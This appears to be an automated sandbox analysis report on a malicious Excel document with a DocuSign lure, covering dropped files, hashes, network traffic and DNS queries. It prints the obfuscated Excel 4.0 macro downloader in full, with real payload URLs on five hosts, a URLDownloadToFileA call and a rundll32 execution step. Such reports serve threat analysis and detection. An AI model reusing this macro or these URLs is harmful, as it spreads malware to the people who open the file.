                                Preview: L..................F...........7G....k1......k1..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WRS6..Desktop.d......QK.XWRS6*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\128757\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......128757..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):4.530954155918767
                                Encrypted:false
                                SSDEEP:3:oyBVomMYlIMbGXEFXrl+1lIMbGXEFXrlmMYlIMbGXEFXrlv:dj6YloEFbaloEFbxYloEFb1
                                MD5:6B72805B48B73E2A0C5F3916B65750FA
                                SHA1:E4B67D9A953F79A407092EA81537FF825DCF384A
                                SHA-256:213571CBA24E6B2DE48D029FD42EB0CDA64EB1A134D9D57AAC02204B0BB1303D
                                SHA-512:3D2A827DB834187A595713A19470FE344C8C50F5F96A201AA5AF7CEF110DEA77BCDD6A7408FD49A36265C78E1D47C8AAF5D54D773FFB97F6E8F043DA30AC23A3
                                Malicious:false
                                Reputation:low
                                Preview: Desktop.LNK=0..[xls]..Complaint-1091191320-02182021.LNK=0..Complaint-1091191320-02182021.LNK=0..[xls]..Complaint-1091191320-02182021.LNK=0..
                                C:\Users\user\Desktop\8DCE0000
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:Applesoft BASIC program data, first line number 16
                                Category:dropped
                                Size (bytes):89200
                                Entropy (8bit):6.512306469238888
                                Encrypted:false
                                SSDEEP:1536:1Y8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdTfsqMPEBE/yqAPEBE/VWYVvDZnY8x:1Y8rmjAItyzElBIL6lECbgBGGP5xLm7b
                                MD5:CCC149B15072E07B9DC7BA9C1510472B
                                SHA1:D639266428533827C25D113E988E1CC55BD085C2
                                SHA-256:E49895013B599224EA0E408969C721DD43BE2BEAA81A24D22787DE99D04F357E
                                SHA-512:26C55624A5A08BE3F437F1FA498661978B501CBE08983420720970C8A53E3D5C083E111DAD95D3FA34827FF34A93B8EE2D52E398A50F1398301A5D3AD56DD79F
                                Malicious:false
                                Reputation:low
                                Preview: ........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.............
                                C:\Users\user\JDFR.hdfgr1
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:HTML document, UTF-8 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):678
                                Entropy (8bit):5.285274611226955
                                Encrypted:false
                                SSDEEP:12:qTWgr2dzLtGc8NZAPvzLUIp1Y2vWMA78h2vu9ZQhUytSAzYNPvK6wcYKpGu:0Wxdz8LkHzA2Y2vW+h2vunQr1CK6Tz
                                MD5:1C7833DA48979334A611F80C7C55F5E6
                                SHA1:B302B4245452489C6241CE4358BD1F07BA4A6767
                                SHA-256:D0D92045526C516AFEC269826EB681EF55DF6353DD9D131BC58A1B19042B7C6C
                                SHA-512:512D0ED4A7BD2BA867C96AF87F114B343FD821A3C826B7F04272AFE40CE218294E893D49167932248DD9297A423B2DC354F07659F979416433DB7F62AF6B0C5C
                                Malicious:false
                                Reputation:low
                                Preview: <!doctype html>..<html>..<head>..<meta charset="utf-8">..<title>Suspend !</title>..<link href="http://suspend.pars.host/css/css.css" rel="stylesheet" type="text/css">..</head>....<body>..<div class="main">..<center><a style="" href="http://pars.host"><img src="http://suspend.pars.host/image/logo.png" /></a></center>..<p align="center">..... ..... .. ...... ..... ... ...<br>........ .... ...... ... ..... ..... . .... .... ... .......<br>....... .. .... <a style="" href="http://pars.host">.... ....</a> .... .... .........<br><br>..</div>....</p>..</body>..</html>..
                                C:\Users\user\JDFR.hdfgr4
                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                File Type:HTML document, ASCII text
                                Category:dropped
                                Size (bytes):494
                                Entropy (8bit):4.962239405540505
                                Encrypted:false
                                SSDEEP:12:hnMQbwzRQ6QclfhxxEdWr+YZrH3atJMlgOt0quoQL:hMxRQspxCQnZrH3atEx0h
                                MD5:0357AA49EA850B11B99D09A2479C321B
                                SHA1:41472BA5C40F61FA1C77C42CF06248F13B8785F0
                                SHA-256:0FF0B7FCB090C65D0BDCB2AF4BBD2C30F33356B3CE9B117186FA20391EF840A3
                                SHA-512:A317A0F035B8DFF7CA60C76B0B75698A3528FD4C7C5E915292C982D2B38C1C937C318362C891E93BEE6FDB1B166764D7183140A837FD23DAA2BE3D2DAC5A5DFC
                                Malicious:false
                                Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.<html>. <head>. <title>Contact Support</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">. </head>. <body marginwidth="0" marginheight="0" leftmargin="0" topmargin="0">. <iframe width="100%" height="100%" frameborder="0" SCROLLING="auto" marginwidth="0" src="http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4"></iframe>. </body>.</html>.

                                Static File Info

                                General

                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:41:44 2021, Security: 0
                                Entropy (8bit):3.7019861909873857
                                TrID:
                                • Microsoft Excel sheet (30009/1) 78.94%
                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                File name:Complaint-1091191320-02182021.xls
                                File size:146944
                                MD5:da47abb08bf5ab8ccd6dde8b8395585d
                                SHA1:f4ffc845ceb85dee839ac85228ff410d9a01bd33
                                SHA256:91b4e89cdfe2e0d0f29642b21d4035ee4201f99e24e5ec841d4c8bb73547cd78
                                SHA512:1215c59e61129a34d96e0f1c574727c18c24517912e087f82defb18d02bad6910f9cc5dffe78f435fabf440c67ca1f6a567e55c496c4b7caca7f4a42234361d5
                                SSDEEP:3072:2cPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMht/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/f:2cPiTQAVW/89BQnmlcGvgZ7r3J8YUOM6
                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                File Icon

                                Icon Hash:e4eea286a4b4bcb4

                                Static OLE Info

                                General

                                Document Type:OLE
                                Number of OLE Files:1

                                OLE File "Complaint-1091191320-02182021.xls"

                                Indicators

                                Has Summary Info:True
                                Application Name:Microsoft Excel
                                Encrypted Document:False
                                Contains Word Document Stream:False
                                Contains Workbook/Book Stream:True
                                Contains PowerPoint Document Stream:False
                                Contains Visio Document Stream:False
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:True

                                Summary

                                Code Page:1251
                                Author:
                                Last Saved By:Friner
                                Create Time:2006-09-16 00:00:00
                                Last Saved Time:2021-02-18 13:41:44
                                Creating Application:Microsoft Excel
                                Security:0

                                Document Summary

                                Document Code Page:1251
                                Thumbnail Scaling Desired:False
                                Contains Dirty Links:False

                                Streams

                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                General
                                Stream Path:\x5DocumentSummaryInformation
                                File Type:data
                                Stream Size:4096
                                Entropy:0.327349318268
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                General
                                Stream Path:\x5SummaryInformation
                                File Type:data
                                Stream Size:4096
                                Entropy:0.265824820061
                                Base64 Encoded:False
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135983
                                General
                                Stream Path:Book
                                File Type:Applesoft BASIC program data, first line number 8
                                Stream Size:135983
                                Entropy:3.7011413863
                                Base64 Encoded:True
                                Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                                Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                Macro 4.0 Code

                                ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",dindorf.com.ar/ntpnttfypqs/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",7ruzezendegi.com/samsgtlfwzt/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",miaovideo.com/wwdtfgdlijlr/ ,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",batikentklinik.com/qtuofsxtov/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",chandni.pk/ictrljsfuh/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,
                                ,,,,,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,,=HALT(),,,,,,,,,,,,,,

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Feb 22, 2021 22:50:47.040433884 CET4916780192.168.2.22181.88.192.136
                                Feb 22, 2021 22:50:47.329508066 CET8049167181.88.192.136192.168.2.22
                                Feb 22, 2021 22:50:47.329638958 CET4916780192.168.2.22181.88.192.136
                                Feb 22, 2021 22:50:47.330399990 CET4916780192.168.2.22181.88.192.136
                                Feb 22, 2021 22:50:47.620830059 CET8049167181.88.192.136192.168.2.22
                                Feb 22, 2021 22:50:48.193165064 CET8049167181.88.192.136192.168.2.22
                                Feb 22, 2021 22:50:48.193255901 CET4916780192.168.2.22181.88.192.136
                                Feb 22, 2021 22:50:48.403328896 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:50:48.536815882 CET8049168185.159.153.72192.168.2.22
                                Feb 22, 2021 22:50:48.536967993 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:50:48.537607908 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:50:48.670792103 CET8049168185.159.153.72192.168.2.22
                                Feb 22, 2021 22:50:49.074884892 CET8049168185.159.153.72192.168.2.22
                                Feb 22, 2021 22:50:49.075159073 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:50:49.077519894 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:50:49.231807947 CET8049168185.159.153.72192.168.2.22
                                Feb 22, 2021 22:50:49.231882095 CET8049168185.159.153.72192.168.2.22
                                Feb 22, 2021 22:50:49.232110977 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:50:49.232572079 CET8049168185.159.153.72192.168.2.22
                                Feb 22, 2021 22:50:49.232685089 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:50:49.573412895 CET4916980192.168.2.22112.125.131.128
                                Feb 22, 2021 22:50:52.580967903 CET4916980192.168.2.22112.125.131.128
                                Feb 22, 2021 22:50:54.236738920 CET8049168185.159.153.72192.168.2.22
                                Feb 22, 2021 22:50:54.236973047 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:50:58.587426901 CET4916980192.168.2.22112.125.131.128
                                Feb 22, 2021 22:51:10.785778046 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:10.864605904 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:10.864765882 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:10.865932941 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:10.944741011 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.157866001 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.157892942 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.157907963 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.157979965 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.158054113 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.158237934 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.158266068 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.158301115 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.158437967 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.158490896 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.158679008 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.158715010 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.158735991 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.158754110 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.158902884 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.158951044 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.158957005 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.158993006 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.159157038 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.159207106 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.236942053 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.236984015 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.236996889 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.237075090 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.237118959 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.237124920 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.237243891 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.237310886 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.237438917 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.237504005 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.237524986 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.237586975 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.237720013 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.237791061 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.237957954 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.238018990 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.238156080 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.238207102 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.238405943 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.238498926 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.238576889 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.238640070 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.238837004 CET80491702.59.117.215192.168.2.22
                                Feb 22, 2021 22:51:12.238903999 CET4917080192.168.2.222.59.117.215
                                Feb 22, 2021 22:51:12.355278015 CET4917180192.168.2.22192.185.16.95
                                Feb 22, 2021 22:51:12.514889002 CET8049171192.185.16.95192.168.2.22
                                Feb 22, 2021 22:51:12.515033960 CET4917180192.168.2.22192.185.16.95
                                Feb 22, 2021 22:51:12.516158104 CET4917180192.168.2.22192.185.16.95
                                Feb 22, 2021 22:51:12.674982071 CET8049171192.185.16.95192.168.2.22
                                Feb 22, 2021 22:51:12.701843023 CET8049171192.185.16.95192.168.2.22
                                Feb 22, 2021 22:51:12.703134060 CET4917180192.168.2.22192.185.16.95
                                Feb 22, 2021 22:51:12.703169107 CET4917180192.168.2.22192.185.16.95
                                Feb 22, 2021 22:51:12.903278112 CET8049171192.185.16.95192.168.2.22
                                Feb 22, 2021 22:51:13.063440084 CET8049171192.185.16.95192.168.2.22
                                Feb 22, 2021 22:51:13.065519094 CET4917180192.168.2.22192.185.16.95
                                Feb 22, 2021 22:51:18.064186096 CET8049171192.185.16.95192.168.2.22
                                Feb 22, 2021 22:51:18.064300060 CET4917180192.168.2.22192.185.16.95
                                Feb 22, 2021 22:51:48.064300060 CET8049171192.185.16.95192.168.2.22
                                Feb 22, 2021 22:52:46.797871113 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:52:46.798182964 CET4916780192.168.2.22181.88.192.136
                                Feb 22, 2021 22:52:47.087100029 CET8049167181.88.192.136192.168.2.22
                                Feb 22, 2021 22:52:47.087214947 CET4916780192.168.2.22181.88.192.136
                                Feb 22, 2021 22:52:47.311597109 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:52:47.920103073 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:52:49.121326923 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:52:51.523926020 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:52:56.329132080 CET4916880192.168.2.22185.159.153.72
                                Feb 22, 2021 22:53:05.939691067 CET4916880192.168.2.22185.159.153.72

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Feb 22, 2021 22:50:46.846165895 CET5219753192.168.2.228.8.8.8
                                Feb 22, 2021 22:50:47.025825024 CET53521978.8.8.8192.168.2.22
                                Feb 22, 2021 22:50:48.205296040 CET5309953192.168.2.228.8.8.8
                                Feb 22, 2021 22:50:48.399307966 CET53530998.8.8.8192.168.2.22
                                Feb 22, 2021 22:50:49.264208078 CET5283853192.168.2.228.8.8.8
                                Feb 22, 2021 22:50:49.569343090 CET53528388.8.8.8192.168.2.22
                                Feb 22, 2021 22:51:10.633824110 CET6120053192.168.2.228.8.8.8
                                Feb 22, 2021 22:51:10.781887054 CET53612008.8.8.8192.168.2.22
                                Feb 22, 2021 22:51:12.168699026 CET4954853192.168.2.228.8.8.8
                                Feb 22, 2021 22:51:12.352528095 CET53495488.8.8.8192.168.2.22

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Feb 22, 2021 22:50:46.846165895 CET192.168.2.228.8.8.80x7e45Standard query (0)dindorf.com.arA (IP address)IN (0x0001)
                                Feb 22, 2021 22:50:48.205296040 CET192.168.2.228.8.8.80xef41Standard query (0)7ruzezendegi.comA (IP address)IN (0x0001)
                                Feb 22, 2021 22:50:49.264208078 CET192.168.2.228.8.8.80x1168Standard query (0)miaovideo.comA (IP address)IN (0x0001)
                                Feb 22, 2021 22:51:10.633824110 CET192.168.2.228.8.8.80x8c10Standard query (0)batikentklinik.comA (IP address)IN (0x0001)
                                Feb 22, 2021 22:51:12.168699026 CET192.168.2.228.8.8.80x2c09Standard query (0)chandni.pkA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Feb 22, 2021 22:50:47.025825024 CET8.8.8.8192.168.2.220x7e45No error (0)dindorf.com.ar181.88.192.136A (IP address)IN (0x0001)
                                Feb 22, 2021 22:50:48.399307966 CET8.8.8.8192.168.2.220xef41No error (0)7ruzezendegi.com185.159.153.72A (IP address)IN (0x0001)
                                Feb 22, 2021 22:50:49.569343090 CET8.8.8.8192.168.2.220x1168No error (0)miaovideo.com112.125.131.128A (IP address)IN (0x0001)
                                Feb 22, 2021 22:51:10.781887054 CET8.8.8.8192.168.2.220x8c10No error (0)batikentklinik.com2.59.117.215A (IP address)IN (0x0001)
                                Feb 22, 2021 22:51:12.352528095 CET8.8.8.8192.168.2.220x2c09No error (0)chandni.pk192.185.16.95A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • dindorf.com.ar
                                • 7ruzezendegi.com
                                • batikentklinik.com
                                • chandni.pk

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249167181.88.192.13680C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                TimestampkBytes transferredDirectionData
                                Feb 22, 2021 22:50:47.330399990 CET0OUTGET /ntpnttfypqs/44249951829861100000.dat HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: dindorf.com.ar
                                Connection: Keep-Alive
                                Feb 22, 2021 22:50:48.193165064 CET1INHTTP/1.1 200 OK
                                Date: Mon, 22 Feb 2021 21:50:48 GMT
                                Content-Type: text/html; charset=ISO-8859-1
                                Content-Length: 0
                                Connection: keep-alive
                                Vary: User-Agent
                                Server: FlowBalancer
                                X-Cache-Status: MISS


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.2249168185.159.153.7280C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                TimestampkBytes transferredDirectionData
                                Feb 22, 2021 22:50:48.537607908 CET1OUTGET /samsgtlfwzt/44249951829861100000.dat HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: 7ruzezendegi.com
                                Connection: Keep-Alive
                                Feb 22, 2021 22:50:49.074884892 CET2INHTTP/1.1 302 Found
                                Date: Mon, 22 Feb 2021 21:50:48 GMT
                                Server: Apache
                                Location: http://7ruzezendegi.com/cgi-sys/suspendedpage.cgi
                                Content-Length: 233
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=iso-8859-1
